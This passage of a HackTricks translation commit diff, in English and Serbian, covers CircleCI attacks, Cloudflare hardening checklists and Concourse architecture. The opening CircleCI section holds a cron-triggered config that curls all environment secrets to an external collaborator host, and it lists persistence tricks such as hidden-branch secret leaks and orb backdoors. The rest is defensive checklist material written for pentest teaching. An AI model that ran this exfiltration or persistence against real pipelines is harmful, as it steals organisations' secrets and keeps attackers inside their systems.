Ako **nemate pristup web konzoli** ali imate **pristup repozitorijumu** i znate da se koristi CircleCI, možete jednostavno **modifikovati radni tok** koji se **pokreće svake minute** i koji **izvlači tajne na spoljašnju adresu**:
```yaml
version: 2.1
jobs:
exfil-env:
docker:
- image: cimg/base:stable
steps:
- checkout
- run:
name: "Exfil env"
command: "curl https://lyn7hzchao276nyvooiekpjn9ef43t.burpcollaborator.net/?a=`env | base64 -w0`"
exfil-env:
docker:
- image: cimg/base:stable
steps:
- checkout
- run:
name: "Exfil env"
command: "curl https://lyn7hzchao276nyvooiekpjn9ef43t.burpcollaborator.net/?a=`env | base64 -w0`"
# I filter by the repo branch where this config.yaml file is located: circleci-project-setup
workflows:
exfil-env-workflow:
triggers:
- schedule:
cron: "* * * * *"
filters:
branches:
only:
- circleci-project-setup
jobs:
- exfil-env:
context: Test-Context
exfil-env-workflow:
triggers:
- schedule:
cron: "* * * * *"
filters:
branches:
only:
- circleci-project-setup
jobs:
- exfil-env:
context: Test-Context
```
> [!WARNING]
> Just creating a new `.circleci/config.yml` in a repo **isn't enough to trigger a circleci build**. You need to **enable it as a project in the circleci console**.
> Samo kreiranje novog `.circleci/config.yml` u repozitorijumu **nije dovoljno da pokrene circleci build**. Morate **omogućiti to kao projekat u circleci konzoli**.
#### Escape to Cloud
#### Bekstvo u Cloud
**CircleCI** gives you the option to run **your builds in their machines or in your own**.\
By default their machines are located in GCP, and you initially won't be able to fid anything relevant. However, if a victim is running the tasks in **their own machines (potentially, in a cloud env)**, you might find a **cloud metadata endpoint with interesting information on it**.
Notice that in the previous examples it was launched everything inside a docker container, but you can also **ask to launch a VM machine** (which may have different cloud permissions):
**CircleCI** vam daje opciju da pokrenete **svoje buildove na njihovim mašinama ili na svojim**.\
Po defaultu, njihove mašine se nalaze u GCP-u, i isprva nećete moći da pronađete ništa relevantno. Međutim, ako žrtva pokreće zadatke na **svojim mašinama (potencijalno, u cloud okruženju)**, mogli biste pronaći **cloud metadata endpoint sa zanimljivim informacijama**.
Primetite da je u prethodnim primerima sve pokrenuto unutar docker kontejnera, ali takođe možete **zatražiti da pokrenete VM mašinu** (koja može imati različite cloud dozvole):
```yaml
jobs:
exfil-env:
#docker:
# - image: cimg/base:stable
machine:
image: ubuntu-2004:current
exfil-env:
#docker:
# - image: cimg/base:stable
machine:
image: ubuntu-2004:current
```
Or even a docker container with access to a remote docker service:
Ili čak docker kontejner sa pristupom udaljenoj docker usluzi:
```yaml
jobs:
exfil-env:
docker:
- image: cimg/base:stable
steps:
- checkout
- setup_remote_docker:
version: 19.03.13
exfil-env:
docker:
- image: cimg/base:stable
steps:
- checkout
- setup_remote_docker:
version: 19.03.13
```
#### Persistence
- It's possible to **create** **user tokens in CircleCI** to access the API endpoints with the users access.
- _https://app.circleci.com/settings/user/tokens_
- It's possible to **create projects tokens** to access the project with the permissions given to the token.
- _https://app.circleci.com/settings/project/github/\<org>/\<repo>/api_
- It's possible to **add SSH keys** to the projects.
- _https://app.circleci.com/settings/project/github/\<org>/\<repo>/ssh_
- It's possible to **create a cron job in hidden branch** in an unexpected project that is **leaking** all the **context env** vars everyday.
- Or even create in a branch / modify a known job that will **leak** all context and **projects secrets** everyday.
- If you are a github owner you can **allow unverified orbs** and configure one in a job as **backdoor**
- You can find a **command injection vulnerability** in some task and **inject commands** via a **secret** modifying its value
- Moguće je **napraviti** **korisničke tokene u CircleCI** za pristup API krajnjim tačkama sa korisničkim pristupom.
- _https://app.circleci.com/settings/user/tokens_
- Moguće je **napraviti tokene projekata** za pristup projektu sa dozvolama datim tokenu.
- _https://app.circleci.com/settings/project/github/\<org>/\<repo>/api_
- Moguće je **dodati SSH ključeve** u projekte.
- _https://app.circleci.com/settings/project/github/\<org>/\<repo>/ssh_
- Moguće je **napraviti cron zadatak u skrivenoj grani** u neočekivanom projektu koji **leak** sve **context env** varijable svakog dana.
- Ili čak napraviti u grani / izmeniti poznati zadatak koji će **leak** sve kontekste i **tajne projekata** svakog dana.
- Ako ste vlasnik github-a, možete **dozvoliti neproverene orbe** i konfigurisati jedan u zadatku kao **backdoor**.
- Možete pronaći **ranjivost za injekciju komandi** u nekom zadatku i **injektovati komande** putem **tajne** menjajući njenu vrednost.
{{#include ../banners/hacktricks-training.md}}

118
src/pentesting-ci-cd/cloudflare-security/README.md
View File

@@ -2,13 +2,13 @@
{{#include ../../banners/hacktricks-training.md}}
In a Cloudflare account there are some **general settings and services** that can be configured. In this page we are going to **analyze the security related settings of each section:**
U Cloudflare nalogu postoje neka **opšta podešavanja i usluge** koja se mogu konfigurisati. Na ovoj stranici ćemo **analizirati podešavanja vezana za sigurnost svake sekcije:**
<figure><img src="../../images/image (117).png" alt=""><figcaption></figcaption></figure>
## Websites
Review each with:
Pregledajte svaku sa:
{{#ref}}
cloudflare-domains.md
@@ -16,9 +16,9 @@ cloudflare-domains.md
### Domain Registration
- [ ] In **`Transfer Domains`** check that it's not possible to transfer any domain.
- [ ] U **`Transfer Domains`** proverite da li nije moguće preneti bilo koji domen.
Review each with:
Pregledajte svaku sa:
{{#ref}}
cloudflare-domains.md
@@ -26,39 +26,39 @@ cloudflare-domains.md
## Analytics
_I couldn't find anything to check for a config security review._
_Nisam mogao pronaći ništa za proveru bezbednosti konfiguracije._
## Pages
On each Cloudflare's page:
Na svakoj Cloudflare stranici:
- [ ] Check for **sensitive information** in the **`Build log`**.
- [ ] Check for **sensitive information** in the **Github repository** assigned to the pages.
- [ ] Check for potential github repo compromise via **workflow command injection** or `pull_request_target` compromise. More info in the [**Github Security page**](../github-security/).
- [ ] Check for **vulnerable functions** in the `/fuctions` directory (if any), check the **redirects** in the `_redirects` file (if any) and **misconfigured headers** in the `_headers` file (if any).
- [ ] Check for **vulnerabilities** in the **web page** via **blackbox** or **whitebox** if you can **access the code**
- [ ] In the details of each page `/<page_id>/pages/view/blocklist/settings/functions`. Check for **sensitive information** in the **`Environment variables`**.
- [ ] In the details page check also the **build command** and **root directory** for **potential injections** to compromise the page.
- [ ] Proverite za **osetljive informacije** u **`Build log`**.
- [ ] Proverite za **osetljive informacije** u **Github repozitorijumu** dodeljenom stranicama.
- [ ] Proverite za potencijalno kompromitovanje github repozitorijuma putem **workflow command injection** ili `pull_request_target` kompromitovanja. Više informacija na [**Github Security page**](../github-security/).
- [ ] Proverite za **ranjive funkcije** u direktorijumu `/fuctions` (ako ih ima), proverite **preusmeravanja** u datoteci `_redirects` (ako ih ima) i **pogrešno konfigurisane zaglavlja** u datoteci `_headers` (ako ih ima).
- [ ] Proverite za **ranjivosti** na **web stranici** putem **blackbox** ili **whitebox** ako možete **pristupiti kodu**
- [ ] U detaljima svake stranice `/<page_id>/pages/view/blocklist/settings/functions`. Proverite za **osetljive informacije** u **`Environment variables`**.
- [ ] U detaljima stranice proverite takođe **build command** i **root directory** za **potencijalne injekcije** koje bi mogle kompromitovati stranicu.
## **Workers**
On each Cloudflare's worker check:
Na svakom Cloudflare radniku proverite:
- [ ] The triggers: What makes the worker trigger? Can a **user send data** that will be **used** by the worker?
- [ ] In the **`Settings`**, check for **`Variables`** containing **sensitive information**
- [ ] Check the **code of the worker** and search for **vulnerabilities** (specially in places where the user can manage the input)
- Check for SSRFs returning the indicated page that you can control
- Check XSSs executing JS inside a svg image
- It is possible that the worker interacts with other internal services. For example, a worker may interact with a R2 bucket storing information in it obtained from the input. In that case, it would be necessary to check what capabilities does the worker have over the R2 bucket and how could it be abused from the user input.
- [ ] Okidače: Šta pokreće radnika? Može li **korisnik poslati podatke** koji će biti **korišćeni** od strane radnika?
- [ ] U **`Settings`**, proverite za **`Variables`** koje sadrže **osetljive informacije**
- [ ] Proverite **kod radnika** i tražite **ranjivosti** (posebno na mestima gde korisnik može upravljati unosom)
- Proverite za SSRF-ove koji vraćaju označenu stranicu koju možete kontrolisati
- Proverite XSS-ove koji izvršavaju JS unutar svg slike
- Moguće je da radnik komunicira sa drugim internim uslugama. Na primer, radnik može komunicirati sa R2 bucket-om koji čuva informacije dobijene iz unosa. U tom slučaju, potrebno je proveriti koje mogućnosti radnik ima nad R2 bucket-om i kako bi to moglo biti zloupotrebljeno iz korisničkog unosa.
> [!WARNING]
> Note that by default a **Worker is given a URL** such as `<worker-name>.<account>.workers.dev`. The user can set it to a **subdomain** but you can always access it with that **original URL** if you know it.
> Imajte na umu da po defaultu **Radniku se dodeljuje URL** kao što je `<worker-name>.<account>.workers.dev`. Korisnik može postaviti na **subdomen** ali uvek možete pristupiti sa tim **originalnim URL-om** ako ga znate.
## R2
On each R2 bucket check:
Na svakom R2 bucket-u proverite:
- [ ] Configure **CORS Policy**.
- [ ] Konfigurišite **CORS Policy**.
## Stream
@@ -70,8 +70,8 @@ TODO
## Security Center
- [ ] If possible, run a **`Security Insights`** **scan** and an **`Infrastructure`** **scan**, as they will **highlight** interesting information **security** wise.
- [ ] Just **check this information** for security misconfigurations and interesting info
- [ ] Ako je moguće, pokrenite **`Security Insights`** **skaniranje** i **`Infrastructure`** **skaniranje**, jer će **istaknuti** zanimljive informacije **u vezi sa sigurnošću**.
- [ ] Samo **proverite ove informacije** za bezbednosne pogrešne konfiguracije i zanimljive informacije
## Turnstile
@@ -86,53 +86,49 @@ cloudflare-zero-trust-network.md
## Bulk Redirects
> [!NOTE]
> Unlike [Dynamic Redirects](https://developers.cloudflare.com/rules/url-forwarding/dynamic-redirects/), [**Bulk Redirects**](https://developers.cloudflare.com/rules/url-forwarding/bulk-redirects/) are essentially static — they do **not support any string replacement** operations or regular expressions. However, you can configure URL redirect parameters that affect their URL matching behavior and their runtime behavior.
> Za razliku od [Dynamic Redirects](https://developers.cloudflare.com/rules/url-forwarding/dynamic-redirects/), [**Bulk Redirects**](https://developers.cloudflare.com/rules/url-forwarding/bulk-redirects/) su suštinski statični — ne podržavaju **nikakve operacije zamene stringova** ili regularne izraze. Međutim, možete konfigurisati parametre URL preusmeravanja koji utiču na njihovo ponašanje u vezi sa usklađivanjem URL-a i njihovim ponašanjem tokom izvršavanja.
- [ ] Check that the **expressions** and **requirements** for redirects **make sense**.
- [ ] Check also for **sensitive hidden endpoints** that you contain interesting info.
- [ ] Proverite da **izrazi** i **zahtevi** za preusmeravanja **ima smisla**.
- [ ] Proverite takođe za **osetljive skrivene krajnje tačke** koje sadrže zanimljive informacije.
## Notifications
- [ ] Check the **notifications.** These notifications are recommended for security:
- `Usage Based Billing`
- `HTTP DDoS Attack Alert`
- `Layer 3/4 DDoS Attack Alert`
- `Advanced HTTP DDoS Attack Alert`
- `Advanced Layer 3/4 DDoS Attack Alert`
- `Flow-based Monitoring: Volumetric Attack`
- `Route Leak Detection Alert`
- `Access mTLS Certificate Expiration Alert`
- `SSL for SaaS Custom Hostnames Alert`
- `Universal SSL Alert`
- `Script Monitor New Code Change Detection Alert`
- `Script Monitor New Domain Alert`
- `Script Monitor New Malicious Domain Alert`
- `Script Monitor New Malicious Script Alert`
- `Script Monitor New Malicious URL Alert`
- `Script Monitor New Scripts Alert`
- `Script Monitor New Script Exceeds Max URL Length Alert`
- `Advanced Security Events Alert`
- `Security Events Alert`
- [ ] Check all the **destinations**, as there could be **sensitive info** (basic http auth) in webhook urls. Make also sure webhook urls use **HTTPS**
- [ ] As extra check, you could try to **impersonate a cloudflare notification** to a third party, maybe you can somehow **inject something dangerous**
- [ ] Proverite **obaveštenja.** Ova obaveštenja se preporučuju za sigurnost:
- `Usage Based Billing`
- `HTTP DDoS Attack Alert`
- `Layer 3/4 DDoS Attack Alert`
- `Advanced HTTP DDoS Attack Alert`
- `Advanced Layer 3/4 DDoS Attack Alert`
- `Flow-based Monitoring: Volumetric Attack`
- `Route Leak Detection Alert`
- `Access mTLS Certificate Expiration Alert`
- `SSL for SaaS Custom Hostnames Alert`
- `Universal SSL Alert`
- `Script Monitor New Code Change Detection Alert`
- `Script Monitor New Domain Alert`
- `Script Monitor New Malicious Domain Alert`
- `Script Monitor New Malicious Script Alert`
- `Script Monitor New Malicious URL Alert`
- `Script Monitor New Scripts Alert`
- `Script Monitor New Script Exceeds Max URL Length Alert`
- `Advanced Security Events Alert`
- `Security Events Alert`
- [ ] Proverite sve **destinacije**, jer može biti **osetljivih informacija** (osnovna http autentifikacija) u webhook URL-ovima. Takođe se pobrinite da webhook URL-ovi koriste **HTTPS**
- [ ] Kao dodatnu proveru, mogli biste pokušati da **imitirate Cloudflare obaveštenje** trećoj strani, možda možete nekako **ubaciti nešto opasno**
## Manage Account
- [ ] It's possible to see the **last 4 digits of the credit card**, **expiration** time and **billing address** in **`Billing` -> `Payment info`**.
- [ ] It's possible to see the **plan type** used in the account in **`Billing` -> `Subscriptions`**.
- [ ] In **`Members`** it's possible to see all the members of the account and their **role**. Note that if the plan type isn't Enterprise, only 2 roles exist: Administrator and Super Administrator. But if the used **plan is Enterprise**, [**more roles**](https://developers.cloudflare.com/fundamentals/account-and-billing/account-setup/account-roles/) can be used to follow the least privilege principle.
- Therefore, whenever possible is **recommended** to use the **Enterprise plan**.
- [ ] In Members it's possible to check which **members** has **2FA enabled**. **Every** user should have it enabled.
- [ ] Moguće je videti **poslednje 4 cifre kreditne kartice**, **datum isteka** i **adresu za naplatu** u **`Billing` -> `Payment info`**.
- [ ] Moguće je videti **tip plana** koji se koristi u nalogu u **`Billing` -> `Subscriptions`**.
- [ ] U **`Members`** moguće je videti sve članove naloga i njihovu **ulogu**. Imajte na umu da ako tip plana nije Enterprise, postoje samo 2 uloge: Administrator i Super Administrator. Ali ako je korišćen **plan Enterprise**, [**više uloga**](https://developers.cloudflare.com/fundamentals/account-and-billing/account-setup/account-roles/) može se koristiti da se prati princip minimalnih privilegija.
- Stoga, kada god je to moguće, **preporučuje se** korišćenje **Enterprise plana**.
- [ ] U članovima je moguće proveriti koji **članovi** imaju **2FA omogućeno**. **Svaki** korisnik bi trebao imati omogućeno.
> [!NOTE]
> Note that fortunately the role **`Administrator`** doesn't give permissions to manage memberships (**cannot escalate privs or invite** new members)
> Imajte na umu da srećom uloga **`Administrator`** ne daje dozvole za upravljanje članstvima (**ne može povećati privilegije ili pozvati** nove članove)
## DDoS Investigation
[Check this part](cloudflare-domains.md#cloudflare-ddos-protection).
[Proverite ovaj deo](cloudflare-domains.md#cloudflare-ddos-protection).
{{#include ../../banners/hacktricks-training.md}}

134
src/pentesting-ci-cd/cloudflare-security/cloudflare-domains.md
View File

@@ -2,29 +2,29 @@
{{#include ../../banners/hacktricks-training.md}}
In each TLD configured in Cloudflare there are some **general settings and services** that can be configured. In this page we are going to **analyze the security related settings of each section:**
U svakom TLD-u konfigurisanom u Cloudflare postoje neka **opšta podešavanja i usluge** koje se mogu konfigurisati. Na ovoj stranici ćemo **analizirati podešavanja vezana za sigurnost svake sekcije:**
<figure><img src="../../images/image (101).png" alt=""><figcaption></figcaption></figure>
### Overview
### Pregled
- [ ] Get a feeling of **how much** are the services of the account **used**
- [ ] Find also the **zone ID** and the **account ID**
- [ ] Steknite osećaj o **koliko** se usluga na računu **koristi**
- [ ] Takođe pronađite **zone ID** i **račun ID**
### Analytics
### Analitika
- [ ] In **`Security`** check if there is any **Rate limiting**
- [ ] U **`Sigurnosti`** proverite da li postoji **ograničenje brzine**
### DNS
- [ ] Check **interesting** (sensitive?) data in DNS **records**
- [ ] Check for **subdomains** that could contain **sensitive info** just based on the **name** (like admin173865324.domin.com)
- [ ] Check for web pages that **aren't** **proxied**
- [ ] Check for **proxified web pages** that can be **accessed directly** by CNAME or IP address
- [ ] Check that **DNSSEC** is **enabled**
- [ ] Check that **CNAME Flattening** is **used** in **all CNAMEs**
- This is could be useful to **hide subdomain takeover vulnerabilities** and improve load timings
- [ ] Check that the domains [**aren't vulnerable to spoofing**](https://book.hacktricks.xyz/network-services-pentesting/pentesting-smtp#mail-spoofing)
- [ ] Proverite **zanimljive** (osetljive?) podatke u DNS **rekordima**
- [ ] Proverite za **poddomene** koje bi mogle sadržati **osetljive informacije** samo na osnovu **imena** (kao što je admin173865324.domin.com)
- [ ] Proverite web stranice koje **nisu** **proksirane**
- [ ] Proverite za **proksirane web stranice** koje se mogu **direktno pristupiti** putem CNAME-a ili IP adrese
- [ ] Proverite da li je **DNSSEC** **omogućen**
- [ ] Proverite da li se **CNAME Flattening** **koristi** u **svim CNAME-ima**
- Ovo može biti korisno za **sakrivanje ranjivosti preuzimanja poddomena** i poboljšanje vremena učitavanja
- [ ] Proverite da li domene [**nisu ranjive na spoofing**](https://book.hacktricks.xyz/network-services-pentesting/pentesting-smtp#mail-spoofing)
### **Email**
@@ -36,91 +36,91 @@ TODO
### SSL/TLS
#### **Overview**
#### **Pregled**
- [ ] The **SSL/TLS encryption** should be **Full** or **Full (Strict)**. Any other will send **clear-text traffic** at some point.
- [ ] The **SSL/TLS Recommender** should be enabled
- [ ] **SSL/TLS enkripcija** treba da bude **Puna** ili **Puna (Stroga)**. Svaka druga će slati **saobraćaj u čistom tekstu** u nekom trenutku.
- [ ] **SSL/TLS Preporučivač** treba da bude omogućen
#### Edge Certificates
#### Edge Sertifikati
- [ ] **Always Use HTTPS** should be **enabled**
- [ ] **HTTP Strict Transport Security (HSTS)** should be **enabled**
- [ ] **Minimum TLS Version should be 1.2**
- [ ] **TLS 1.3 should be enabled**
- [ ] **Automatic HTTPS Rewrites** should be **enabled**
- [ ] **Certificate Transparency Monitoring** should be **enabled**
- [ ] **Uvek koristite HTTPS** treba da bude **omogućeno**
- [ ] **HTTP Stroga Transportna Bezbednost (HSTS)** treba da bude **omogućena**
- [ ] **Minimalna TLS verzija treba da bude 1.2**
- [ ] **TLS 1.3 treba da bude omogućen**
- [ ] **Automatska HTTPS Prepravka** treba da bude **omogućena**
- [ ] **Praćenje Transparentnosti Sertifikata** treba da bude **omogućeno**
### **Security**
### **Sigurnost**
- [ ] In the **`WAF`** section it's interesting to check that **Firewall** and **rate limiting rules are used** to prevent abuses.
- The **`Bypass`** action will **disable Cloudflare security** features for a request. It shouldn't be used.
- [ ] In the **`Page Shield`** section it's recommended to check that it's **enabled** if any page is used
- [ ] In the **`API Shield`** section it's recommended to check that it's **enabled** if any API is exposed in Cloudflare
- [ ] In the **`DDoS`** section it's recommended to enable the **DDoS protections**
- [ ] In the **`Settings`** section:
- [ ] Check that the **`Security Level`** is **medium** or greater
- [ ] Check that the **`Challenge Passage`** is 1 hour at max
- [ ] Check that the **`Browser Integrity Check`** is **enabled**
- [ ] Check that the **`Privacy Pass Support`** is **enabled**
- [ ] U sekciji **`WAF`** zanimljivo je proveriti da li se koriste **pravila vatrozida** i **ograničenja brzine** za sprečavanje zloupotreba.
- Akcija **`Zaobiđi`** će **onemogućiti Cloudflare sigurnosne** funkcije za zahtev. Ne bi trebala da se koristi.
- [ ] U sekciji **`Page Shield`** preporučuje se da proverite da li je **omogućena** ako se koristi neka stranica
- [ ] U sekciji **`API Shield`** preporučuje se da proverite da li je **omogućena** ako je neki API izložen u Cloudflare
- [ ] U sekciji **`DDoS`** preporučuje se omogućiti **DDoS zaštite**
- [ ] U sekciji **`Podešavanja`**:
- [ ] Proverite da je **`Nivo sigurnosti`** **srednji** ili veći
- [ ] Proverite da je **`Izazov Prolaz`** 1 sat maksimalno
- [ ] Proverite da je **`Provera Integriteta Pregledača`** **omogućena**
- [ ] Proverite da je **`Podrška za Privatnost Pass`** **omogućena**
#### **CloudFlare DDoS Protection**
#### **CloudFlare DDoS Zaštita**
- If you can, enable **Bot Fight Mode** or **Super Bot Fight Mode**. If you protecting some API accessed programmatically (from a JS front end page for example). You might not be able to enable this without breaking that access.
- In **WAF**: You can create **rate limits by URL path** or to **verified bots** (Rate limiting rules), or to **block access** based on IP, Cookie, referrer...). So you could block requests that doesn't come from a web page or has a cookie.
- If the attack is from a **verified bot**, at least **add a rate limit** to bots.
- If the attack is to a **specific path**, as prevention mechanism, add a **rate limit** in this path.
- You can also **whitelist** IP addresses, IP ranges, countries or ASNs from the **Tools** in WAF.
- Check if **Managed rules** could also help to prevent vulnerability exploitations.
- In the **Tools** section you can **block or give a challenge to specific IPs** and **user agents.**
- In DDoS you could **override some rules to make them more restrictive**.
- **Settings**: Set **Security Level** to **High** and to **Under Attack** if you are Under Attack and that the **Browser Integrity Check is enabled**.
- In Cloudflare Domains -> Analytics -> Security -> Check if **rate limit** is enabled
- In Cloudflare Domains -> Security -> Events -> Check for **detected malicious Events**
- Ako možete, omogućite **Bot Fight Mode** ili **Super Bot Fight Mode**. Ako štitite neki API koji se pristupa programatski (na primer, sa JS front-end stranice). Možda nećete moći da omogućite ovo bez prekidanja tog pristupa.
- U **WAF**: Možete kreirati **ograničenja brzine po URL putanji** ili za **verifikovane botove** (pravila ograničenja brzine), ili da **blokirate pristup** na osnovu IP, kolačića, referera...). Tako možete blokirati zahteve koji ne dolaze sa web stranice ili nemaju kolačić.
- Ako je napad od **verifikovanog bota**, barem **dodajte ograničenje brzine** za botove.
- Ako je napad na **specifičnu putanju**, kao mehanizam prevencije, dodajte **ograničenje brzine** na ovoj putanji.
- Takođe možete **dodati na belu listu** IP adrese, IP opsege, zemlje ili ASN-ove iz **Alata** u WAF-u.
- Proverite da li **Upravljana pravila** takođe mogu pomoći u sprečavanju eksploatacije ranjivosti.
- U sekciji **Alati** možete **blokirati ili dati izazov specifičnim IP-ovima** i **korisničkim agentima.**
- U DDoS-u možete **prepraviti neka pravila da ih učinite restriktivnijim**.
- **Podešavanja**: Postavite **Nivo sigurnosti** na **Visok** i na **Pod Napadom** ako ste Pod Napadom i da je **Provera Integriteta Pregledača omogućena**.
- U Cloudflare Domains -> Analitika -> Sigurnost -> Proverite da li je **ograničenje brzine** omogućeno
- U Cloudflare Domains -> Sigurnost -> Događaji -> Proverite za **otkrivene zlonamerne Događaje**
### Access
### Pristup
{{#ref}}
cloudflare-zero-trust-network.md
{{#endref}}
### Speed
### Brzina
_I couldn't find any option related to security_
_Nisam mogao pronaći nijednu opciju vezanu za sigurnost_
### Caching
### Keširanje
- [ ] In the **`Configuration`** section consider enabling the **CSAM Scanning Tool**
- [ ] U sekciji **`Konfiguracija`** razmotrite omogućavanje **CSAM Alata za Skener**
### **Workers Routes**
### **Workers Rute**
_You should have already checked_ [_cloudflare workers_](./#workers)
_Već ste trebali proveriti_ [_cloudflare workers_](./#workers)
### Rules
### Pravila
TODO
### Network
### Mreža
- [ ] If **`HTTP/2`** is **enabled**, **`HTTP/2 to Origin`** should be **enabled**
- [ ] **`HTTP/3 (with QUIC)`** should be **enabled**
- [ ] If the **privacy** of your **users** is important, make sure **`Onion Routing`** is **enabled**
- [ ] Ako je **`HTTP/2`** **omogućen**, **`HTTP/2 do Origin`** treba da bude **omogućen**
- [ ] **`HTTP/3 (sa QUIC)`** treba da bude **omogućen**
- [ ] Ako je **privatnost** vaših **korisnika** važna, uverite se da je **`Onion Routing`** **omogućen**
### **Traffic**
### **Saobraćaj**
TODO
### Custom Pages
### Prilagođene Stranice
- [ ] It's optional to configure custom pages when an error related to security is triggered (like a block, rate limiting or I'm under attack mode)
- [ ] Opcionalno je konfigurisati prilagođene stranice kada se aktivira greška vezana za sigurnost (kao što je blokada, ograničenje brzine ili sam pod napadom)
### Apps
### Aplikacije
TODO
### Scrape Shield
- [ ] Check **Email Address Obfuscation** is **enabled**
- [ ] Check **Server-side Excludes** is **enabled**
- [ ] Proverite da li je **Obfuscation Email Adresa** **omogućena**
- [ ] Proverite da li su **Isključenja na Serverskoj Strani** **omogućena**
### **Zaraz**
@@ -131,7 +131,3 @@ TODO
TODO
{{#include ../../banners/hacktricks-training.md}}

46
src/pentesting-ci-cd/cloudflare-security/cloudflare-zero-trust-network.md
View File

@@ -2,43 +2,43 @@
{{#include ../../banners/hacktricks-training.md}}
In a **Cloudflare Zero Trust Network** account there are some **settings and services** that can be configured. In this page we are going to **analyze the security related settings of each section:**
U **Cloudflare Zero Trust Network** nalogu postoje neka **podešavanja i usluge** koja se mogu konfigurisati. Na ovoj stranici ćemo **analizirati podešavanja vezana za sigurnost svake sekcije:**
<figure><img src="../../images/image (206).png" alt=""><figcaption></figcaption></figure>
### Analytics
- [ ] Useful to **get to know the environment**
- [ ] Korisno za **upoznavanje sa okruženjem**
### **Gateway**
- [ ] In **`Policies`** it's possible to generate policies to **restrict** by **DNS**, **network** or **HTTP** request who can access applications.
- If used, **policies** could be created to **restrict** the access to malicious sites.
- This is **only relevant if a gateway is being used**, if not, there is no reason to create defensive policies.
- [ ] U **`Policies`** je moguće generisati politike za **ograničavanje** pristupa aplikacijama na osnovu **DNS**, **mreže** ili **HTTP** zahteva.
- Ako se koristi, **politike** mogu biti kreirane za **ograničavanje** pristupa zlonamernim sajtovima.
- Ovo je **samo relevantno ako se koristi gateway**, inače nema razloga za kreiranje odbrambenih politika.
### Access
#### Applications
On each application:
Na svakoj aplikaciji:
- [ ] Check **who** can access to the application in the **Policies** and check that **only** the **users** that **need access** to the application can access.
- To allow access **`Access Groups`** are going to be used (and **additional rules** can be set also)
- [ ] Check the **available identity providers** and make sure they **aren't too open**
- [ ] In **`Settings`**:
- [ ] Check **CORS isn't enabled** (if it's enabled, check it's **secure** and it isn't allowing everything)
- [ ] Cookies should have **Strict Same-Site** attribute, **HTTP Only** and **binding cookie** should be **enabled** if the application is HTTP.
- [ ] Consider enabling also **Browser rendering** for better **protection. More info about** [**remote browser isolation here**](https://blog.cloudflare.com/cloudflare-and-remote-browser-isolation/)**.**
- [ ] Proverite **ko** može pristupiti aplikaciji u **Policies** i proverite da **samo** **korisnici** koji **trebaju pristup** aplikaciji mogu pristupiti.
- Da bi se omogućio pristup, koristiće se **`Access Groups`** (i **dodatna pravila** se takođe mogu postaviti)
- [ ] Proverite **dostupne provajdere identiteta** i uverite se da **nisu previše otvoreni**
- [ ] U **`Settings`**:
- [ ] Proverite da **CORS nije omogućen** (ako je omogućen, proverite da je **siguran** i da ne dozvoljava sve)
- [ ] Kolačići bi trebali imati **Strict Same-Site** atribut, **HTTP Only** i **binding cookie** bi trebali biti **omogućeni** ako je aplikacija HTTP.
- [ ] Razmotrite omogućavanje **Browser rendering** za bolju **zaštitu. Više informacija o** [**remote browser isolation ovde**](https://blog.cloudflare.com/cloudflare-and-remote-browser-isolation/)**.**
#### **Access Groups**
- [ ] Check that the access groups generated are **correctly restricted** to the users they should allow.
- [ ] It's specially important to check that the **default access group isn't very open** (it's **not allowing too many people**) as by **default** anyone in that **group** is going to be able to **access applications**.
- Note that it's possible to give **access** to **EVERYONE** and other **very open policies** that aren't recommended unless 100% necessary.
- [ ] Proverite da su grupe za pristup generisane **ispravno ograničene** na korisnike kojima bi trebale omogućiti pristup.
- [ ] Posebno je važno proveriti da **podrazumevana grupa za pristup nije previše otvorena** (ne **dozvoljava previše ljudi**) jer je po **podrazumevano** svako u toj **grupi** u mogućnosti da **pristupi aplikacijama**.
- Imajte na umu da je moguće dati **pristup** **SVIMA** i druge **veoma otvorene politike** koje se ne preporučuju osim ako nisu 100% neophodne.
#### Service Auth
- [ ] Check that all service tokens **expires in 1 year or less**
- [ ] Proverite da svi tokeni usluga **isteknu za 1 godinu ili manje**
#### Tunnels
@@ -50,16 +50,12 @@ TODO
### Logs
- [ ] You could search for **unexpected actions** from users
- [ ] Možete tražiti **neočekivane akcije** od korisnika
### Settings
- [ ] Check the **plan type**
- [ ] It's possible to see the **credits card owner name**, **last 4 digits**, **expiration** date and **address**
- [ ] It's recommended to **add a User Seat Expiration** to remove users that doesn't really use this service
- [ ] Proverite **tip plana**
- [ ] Moguće je videti **ime vlasnika kreditne kartice**, **poslednje 4 cifre**, **datum isteka** i **adresu**
- [ ] Preporučuje se da se **doda isteka korisničkog mesta** kako bi se uklonili korisnici koji zaista ne koriste ovu uslugu
{{#include ../../banners/hacktricks-training.md}}

18
src/pentesting-ci-cd/concourse-security/README.md
View File

@@ -2,13 +2,13 @@
{{#include ../../banners/hacktricks-training.md}}
## Basic Information
## Osnovne Informacije
Concourse allows you to **build pipelines** to automatically run tests, actions and build images whenever you need it (time based, when something happens...)
Concourse vam omogućava da **pravite pipeline-e** za automatsko pokretanje testova, akcija i izgradnju slika kada god vam zatreba (na osnovu vremena, kada se nešto desi...)
## Concourse Architecture
## Arhitektura Concourse-a
Learn how the concourse environment is structured in:
Saznajte kako je okruženje concourse-a strukturirano u:
{{#ref}}
concourse-architecture.md
@@ -16,22 +16,18 @@ concourse-architecture.md
## Concourse Lab
Learn how you can run a concourse environment locally to do your own tests in:
Saznajte kako možete pokrenuti concourse okruženje lokalno da biste uradili svoje testove u:
{{#ref}}
concourse-lab-creation.md
{{#endref}}
## Enumerate & Attack Concourse
## Enumeracija i Napad na Concourse
Learn how you can enumerate the concourse environment and abuse it in:
Saznajte kako možete enumerisati okruženje concourse-a i zloupotrebiti ga u:
{{#ref}}
concourse-enumeration-and-attacks.md
{{#endref}}
{{#include ../../banners/hacktricks-training.md}}

36
src/pentesting-ci-cd/concourse-security/concourse-architecture.md
View File

@@ -1,42 +1,38 @@
# Concourse Architecture
# Concourse Arhitektura
## Concourse Architecture
## Concourse Arhitektura
{{#include ../../banners/hacktricks-training.md}}
[**Relevant data from Concourse documentation:**](https://concourse-ci.org/internals.html)
[**Relevantni podaci iz Concourse dokumentacije:**](https://concourse-ci.org/internals.html)
### Architecture
### Arhitektura
![](<../../images/image (187).png>)
#### ATC: web UI & build scheduler
#### ATC: web UI i raspoređivač gradnje
The ATC is the heart of Concourse. It runs the **web UI and API** and is responsible for all pipeline **scheduling**. It **connects to PostgreSQL**, which it uses to store pipeline data (including build logs).
ATC je srce Concourse-a. Pokreće **web UI i API** i odgovoran je za sve **raspoređivanje** pipeline-a. **Povezuje se sa PostgreSQL**, koji koristi za skladištenje podataka o pipeline-u (uključujući logove gradnje).
